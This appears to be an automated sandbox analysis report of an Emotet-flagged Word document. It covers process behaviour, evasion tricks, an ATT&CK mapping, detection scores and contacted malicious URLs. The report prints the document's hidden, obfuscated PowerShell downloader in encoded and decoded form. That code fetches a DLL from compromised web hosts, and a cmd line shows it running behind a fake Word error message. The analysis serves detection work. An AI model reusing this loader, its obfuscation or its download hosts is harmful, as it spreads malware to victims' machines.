AoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJ
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFA16253AAA push eax; retf | 5_2_00007FFA16253AF1

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5446
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3119
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504 | Thread sleep count: 5446 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504 | Thread sleep count: 3119 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524 | Thread sleep time: -922337203685477s >= -30000s
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000005.00000002.345845297.000001924A64C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000005.00000002.346040402.000001924AA20000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'sJump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD
0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter 11 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting 12 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell 3 | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 2 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 12 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection 1 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Adjunto K_23165.doc | 70% | Virustotal |
Adjunto K_23165.doc | 57% | Metadefender |
Adjunto K_23165.doc | 86% | ReversingLabs | Document-Word.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
calltorepair.com | 9% | Virustotal |
giatot365.com | 8% | Virustotal |
opheliasbrewery.com | 14% | Virustotal |
xuanthinhshop.com | 10% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://xuanthinhshop.comx | 0% | Avira URL Cloud | safe
http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK | 100% | Avira URL Cloud | malware
https://cdn.entity. | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://giatot365.com/wp-content/uploads/2020/Sx/ | 100% | Avira URL Cloud | malware
https://www.calltorepair.com/wp-content/themes/thefox/style.css | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.png | 100% | Avira URL Cloud | phishing
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://www.calltorepair.com/blog/ | 100% | Avira URL Cloud | phishing
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://www.calltorepair.com/project/world-business/ | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.css | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.css | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.css | 100% | Avira URL Cloud | phishing
https://ncus.contentsync. | 0% | URL Reputation | safe
https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-json/ | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.png | 100% | Avira URL Cloud | phishing
https://wus2.contentsync. | 0% | URL Reputation | safe
http://cherkashchanu.com/Z:/4ZE8/ | 100% | Avira URL Cloud | malware
https://www.calltorepair.com/wp-content/themes/thefox/js/html5.js | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatu | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/themes/thefox/css/animations.css | 100% | Avira URL Cloud | phishing
http://tongdaihanoi.com/847346324234234/rpnvXm/ | 100% | Avira URL Cloud | malware
https://www.calltorepair.com/project/luv-summer/ | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js | 100% | Avira URL Cloud | phishing
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.css | 100% | Avira URL Cloud | phishing
https://giatot365.com | 0% | Avira URL Cloud | safe
https://giatot365.com/wp-content/uploads/2 | 0% | Avira URL Cloud | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://www.calltorepair.com/wp-admin/admin-ajax.php | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/xmlrpc.php?rsd | 100% | Avira URL Cloud | phishing
https://staging.cortana.ai | 0% | URL Reputation | safe
http://opheliasbrewery.com | 0% | Avira URL Cloud | safe
https://www.calltorepair.com/about-us/ | 100% | Avira URL Cloud | phishing
http://giatot365.com | 0% | Avira URL Cloud | safe
https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.css | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-content/themes/thefox/style_end.css | 100% | Avira URL Cloud | phishing
https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.css | 100% | Avira URL Cloud | phishing
https://wus2.pagecontentsync. | 0% | URL Reputation | safe
https://www.calltorepair.com/project/great-project/ | 100% | Avira URL Cloud | phishing
https://cortana.ai/api | 0% | URL Reputation | safe
http://cherkashchanu.com | 0% | Avira URL Cloud | safe
http://servicios.semperti.com | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
calltorepair.com | 107.180.2.185 | true | true | | unknown
giatot365.com | 103.28.39.103 | true | true | | unknown
opheliasbrewery.com | 35.209.212.48 | true | true | | unknown
xuanthinhshop.com | 139.180.215.83 | true | true | | unknown
tongdaihanoi.com | 151.106.5.169 | true | true | | unknown
cherkashchanu.com | 185.104.45.33 | true | true | | unknown
servicios.semperti.com | unknown | unknown | true | | unknown
www.calltorepair.com | unknown | unknown | true | | unknown

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://cherkashchanu.com/Z:/4ZE8/ | true | Avira URL Cloud: malware | unknown
http://tongdaihanoi.com/847346324234234/rpnvXm/ | true | Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://shell.suite.office.com:1443EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
            high
            https://autodiscover-s.outlook.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
              high
              https://xuanthinhshop.comxpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKpowershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmp, Ppnq9j.dll.5.drtrue
              • Avira URL Cloud: malware
              unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                high
                https://cdn.entity.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                  high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://lookup.onenote.com/lookup/geolocation/v1EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                    high
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                      high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                        high
                        https://api.aadrm.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                          high
                          https://api.microsoftstream.com/api/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                            high
                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                              high
                              https://cr.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpfalse
                                  high
                                  https://giatot365.com/wp-content/uploads/2020/Sx/powershell.exe, 00000005.00000002.340589263.0000019232B6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://www.calltorepair.com/wp-content/themes/thefox/style.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.337858164.00000192321F1000.00000004.00000001.sdmpfalse
                                    high
                                    https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://res.getmicrosoftkey.com/api/redemptioneventsEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://tasks.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      high
                                      https://officeci.azurewebsites.net/api/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.calltorepair.com/blog/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://store.office.cn/addinstemplateEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
